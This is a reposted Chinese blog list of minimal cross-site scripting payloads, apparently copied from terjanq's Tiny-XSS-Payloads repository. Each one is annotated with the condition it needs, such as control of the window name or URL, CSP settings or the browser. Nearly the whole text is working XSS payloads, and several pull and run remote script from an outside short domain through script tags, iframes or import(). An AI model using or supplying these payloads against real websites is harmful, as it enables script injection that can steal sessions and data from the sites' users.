标签:XSS 弃用 terjanq current github Payloads 集合
XSS-Payloads
<!-- 仅适用于反射型XSS --!>
<svg/onload=eval(name)>
<!-- 如果你控制了 URL -->
<svg/onload=eval(`'`+URL)>
<!-- 如果你控制了名字,但是 unsafe-eval 没有启用 -->
<svg/onload=location=name>
<!-- 在 chrome 中,也适用于 innerHTML,即使在尚未插入 DOM 的元素上 -->
<svg><svg/onload=eval(name)>
<!-- 如果您控制窗口的名称,此有效负载将在innerHTML 内工作,即使在尚未插入DOM 的元素上-->
<audio/src/onerror=eval(name)>
<!-- 如果您控制 URL,此有效负载将在 innerHTML 内工作,即使在尚未插入 DOM 的元素上 -->
<img/src/onerror=eval(`'`+URL)>
<!-- 随便一个脚本 -->
<script/src=//NJ.₨></script>
<!-- 如果你控制了窗口的名字 -->
<iframe/onload=src=top.name>
<!-- 如果你控制了 URL -->
<iframe/onload=eval(`'`+URL)>
<!-- 如果页面上的 iframe 数量不变 -->
<iframe/onload=src=top[0].name+/\NJ.₨?/>
<!-- 仅适用于 Firefox -->
<iframe/srcdoc="<svg><script/href=//NJ.₨ />">
<!-- 如果页面上的 iframe 数量是随机的 -->
<iframe/onload=src=contentWindow.name+/\NJ.₨?/>
<!-- 如果在 CSP 中禁用 unsafe-inline 并且允许外部脚本 -->
<iframe/srcdoc="<script/src=//NJ.₨></script>">
<!-- 如果允许内联样式 -->
<style/onload=eval(name)>
<!-- 如果允许内联样式并且可以控制 URL -->
<style/onload=eval(`'`+URL)>
<!-- 如果内联样式被阻止 -->
<style/onerror=eval(name)>
<!-- 使用外部脚本作为导入,在innerHTML 中不起作用,除非Firefox -->
<!-- PoC 仅适用于 https 和 Chrome,因为 NJ.₨ 检查 Sec-Fetch-Dest 标头 -->
<svg/onload=import(/\\NJ.₨/)>
<!-- 使用外部脚本作为导入,如果允许内联样式则触发。
<!-- PoC 仅适用于 https 和 Chrome,因为 NJ.₨ 检查 Sec-Fetch-Dest 标头 -->
<style/onload=import(/\\NJ.₨/)>
<!-- 使用外部脚本作为导入 -->
<!-- PoC 仅适用于 https 和 Chrome,因为 NJ.₨ 检查 Sec-Fetch-Dest 标头 -->
<iframe/onload=import(/\\NJ.₨/)>
弃用
<!-- 如果你控制了网址,Safari-only -->
<iframe/onload=write(URL)>
<!-- 如果允许内联样式,仅 Safari -->
<style/onload=write(URL)>
参考链接
https://github.com/terjanq/Tiny-XSS-Payloads#current-payloads
标签:XSS,弃用,terjanq,current,github,Payloads,集合 来源: https://blog.csdn.net/weixin_44309905/article/details/120906948
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。